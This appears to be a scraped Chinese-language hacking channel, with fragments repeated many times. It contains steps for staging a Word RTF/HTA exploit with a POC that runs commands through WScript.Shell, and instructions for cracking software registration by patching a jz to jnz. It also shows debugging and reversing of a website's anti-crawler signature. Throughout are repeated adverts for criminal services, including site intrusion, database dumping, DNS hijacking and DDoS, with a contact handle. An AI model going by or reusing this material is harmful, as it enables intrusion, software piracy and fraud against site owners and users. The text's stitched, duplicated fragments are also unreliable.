在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf
root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf
新建Word文档,插入对象
并保存为rtf文件,如233.rtf
删除服务器上的test.rtf文件
并将poc.hta文件复制到ms目录下,并改名为test.rtf
root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf
新建Word文档,插入对象
并保存为rtf文件,如233.rtf
删除服务器上的test.rtf文件
并将poc.hta文件复制到ms目录下,并改名为test.rtf
❤1
一台apache服务器(这里我用Kali)、POC和一个Word文档。
POC内容大概如下:
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>
然后将其放在Kali服务器上
Apache需要开启DAV支持
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
POC内容大概如下:
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>
然后将其放在Kali服务器上
Apache需要开启DAV支持
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
❤2
所以我们只需要把jz改成jnz即可 操作如下
设置->常规 显示机器码
编辑->修补程序->单字节修补
本来是84 改成85即可
修改完毕后 编辑->修补程序->修补程序到应用即可
效果如下
设置->常规 显示机器码
编辑->修补程序->单字节修补
本来是84 改成85即可
修改完毕后 编辑->修补程序->修补程序到应用即可
效果如下
❤1👍1
既然静态代码已经破解成功了,试试看能不能动态调试破解。
因为od只能调试32位程序 我们下载一个386的x**y 并载入od 一开始使用读入内容断点和打开文件断点 都无法debug。 直到后面才发现是用图中所指向函数来获取注册时间
在下个时间 断点那个函数
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
因为od只能调试32位程序 我们下载一个386的x**y 并载入od 一开始使用读入内容断点和打开文件断点 都无法debug。 直到后面才发现是用图中所指向函数来获取注册时间
在下个时间 断点那个函数
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
❤1👍1
为了可以正确执行64位指令,可以采用gdbserver+IDA64的调试方式。
gdbserver启动程序,并绑定到1234端口(冒号前不带ip使用本机ip)
gdbserver :1234 ./father
用IDA64打开程序,此时是无法使用F5查看伪代码的,但是可以看到IDA64识别了32位的程序,汇编能够正常显示。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
gdbserver启动程序,并绑定到1234端口(冒号前不带ip使用本机ip)
gdbserver :1234 ./father
用IDA64打开程序,此时是无法使用F5查看伪代码的,但是可以看到IDA64识别了32位的程序,汇编能够正常显示。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
首先打开 Chrome DevTools 我们在 Network 面板里面,我们发现了这个有意思的接口,但是情况比我们之前预想的要复杂(真正实战中,你也会碰到各种奇葩的变异套路)我这里只是遇到了这一种,看起来貌似它校验了三个不同的参数。
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
❤3👍1
这个函数就直接传入 "refresh" 字符串即可,然后之前那个createKeyCore 其实就没必要有success和error函数
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
#黑客 #快手 #入侵 #ddos
❤2👍1
这些函数互相调用,为了方便,我这里直接将这些函数整个大的闭包拿出来构造。
最后我们成功的构造完成了。但是发现全局还缺少了一个:byted_acrawler 变量
我们全局搜索这个变量 最后在html里面找到了他的init方法,说明这个是一个库,引入库就没有问题了。
至此,整个数据的逆向生成就完成了。
详细代码就不贴了,这里在空白的网页里面演示一下我构造的执行结果:
最后我们成功的构造完成了。但是发现全局还缺少了一个:byted_acrawler 变量
我们全局搜索这个变量 最后在html里面找到了他的init方法,说明这个是一个库,引入库就没有问题了。
至此,整个数据的逆向生成就完成了。
详细代码就不贴了,这里在空白的网页里面演示一下我构造的执行结果:
❤1